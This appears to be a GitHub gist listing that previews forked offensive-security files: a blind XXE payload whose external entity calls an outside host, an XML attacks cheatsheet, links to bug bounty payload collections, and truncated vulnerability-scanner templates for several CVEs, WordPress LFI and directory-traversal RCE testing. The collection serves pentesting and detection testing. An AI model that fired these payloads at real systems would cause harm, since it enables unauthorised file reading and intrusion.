This gist gather a list of log4shell payloads seen on my twitter feeds.
💨 I will update it every time I see new payloads.
The goal is to allows testing detection regexes defined in protection systems.
0xSojalSec
/ log4shell-payloads.md
Created
July 24, 2022 18:08
— forked from righettod/log4shell-payloads.md
List of log4shell payloads seen on my twitter feeds
0xSojalSec
/ XXE_payloads
Created
July 24, 2022 18:08
— forked from staaldraad/XXE_payloads
XXE Payloads
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |
0xSojalSec
/ xml-attacks.md
Created
July 24, 2022 18:07
— forked from mgeeky/xml-attacks.md
XML Vulnerabilities and Attacks cheatsheet
XML processing modules may be not secure against maliciously constructed data. An attacker could abuse XML features to carry out denial of service attacks, access logical files, generate network connections to other machines, or circumvent firewalls.
The penetration tester running XML tests against application will have to determine which XML parser is in use, and then to what kinds of below listed attacks that parser will be vulnerable.
0xSojalSec
/ Bug Bounty Checklist and Cheatsheets.md
Created
July 24, 2022 18:07
— forked from OTaKuHP/Bug Bounty Checklist and Cheatsheets.md
0xSojalSec
/ Bug Bounty payloads.md
Created
July 24, 2022 18:07
— forked from OTaKuHP/Bug Bounty payloads.md
PayloadsAllTheThings - https://lnkd.in/gjTPbtz
cujanovic - https://lnkd.in/gSTJQN4
Payload Box (cmdi , sqli , xss , lfi , rfi etc) - https://lnkd.in/g6B28dU
SecLists - https://lnkd.in/g6ucAZQ
0xSojalSec
/ Mobile Pentesting Resources.md
Created
July 24, 2022 18:07
— forked from OTaKuHP/Mobile Pentesting Resources.md
0xSojalSec
/ CVE-2020-0646
Created
July 13, 2022 14:56
— forked from 0x240x23elu/CVE-2020-0646
CVE-2020-0646
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| info: | |
| name: CVE-2020-0646 | |
| author: 0x240x23elu | |
| severity: High | |
| requests: | |
| - raw: | |
| - | | |
| POST /EN/_vti_bin/WebPartPages.asmx HTTP/1.1 | |
| Host: {{Hostname}} |
0xSojalSec
/ CVE-2020-17519
Created
July 13, 2022 14:48
— forked from 0x240x23elu/CVE-2020-17519
CVE-2020-17519
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: CVE-2020-17519 | |
| info: | |
| name: Apache Flink Arbitrary file reading with JobManager | |
| author: 0x240x23elu & 0rich1 of Ant Security FG Lab | |
| severity: High | |
| requests: | |
| - method: GET | |
| path: |
0xSojalSec
/ wordpress-LFI.yaml
Created
July 13, 2022 14:46
— forked from 0x240x23elu/wordpress-LFI.yaml
wordpress-LFI
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: wordpress-LFI | |
| info: | |
| name: wordpress-LFI | |
| author: 0x240x23elu | |
| severity: High | |
| requests: | |
| - method: GET | |
| path: |
0xSojalSec
/ CVE_RCE2-1.yaml
Created
July 13, 2022 14:46
— forked from 0x240x23elu/CVE_RCE2-1.yaml
CVE_RCE2-1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: CVE_RCE2-1 | |
| info: | |
| name: CVE_RCE2 | |
| author: 0x240x23elu | |
| severity: high | |
| requests: | |
| - payloads: | |
| dirt: /mnt/d/tools/alltest/myopen/payload/PayloadsAllTheThings/DirectoryTraversal/Intruder/traversals-8-deep-exotic-encoding.txt |